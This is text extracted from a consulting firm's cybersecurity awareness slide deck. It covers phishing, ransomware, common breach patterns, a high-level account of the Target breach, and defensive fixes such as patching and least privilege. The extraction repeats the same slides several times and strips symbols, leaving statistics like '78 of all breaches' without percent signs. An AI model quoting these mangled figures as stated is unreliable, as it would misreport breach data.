Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBERSECURITY COMMON TERMS AND DEFINITIONS
22
Dark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or
means Darknet sites require special software such as TOR (The Onion Router) that helps keep users
anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or
Credit card data as well as Botnet rentals Bitcoins are traded on the Dark web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public
ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing
power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves
solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving
a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash
that is the amount of computing power involved ndash increases
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
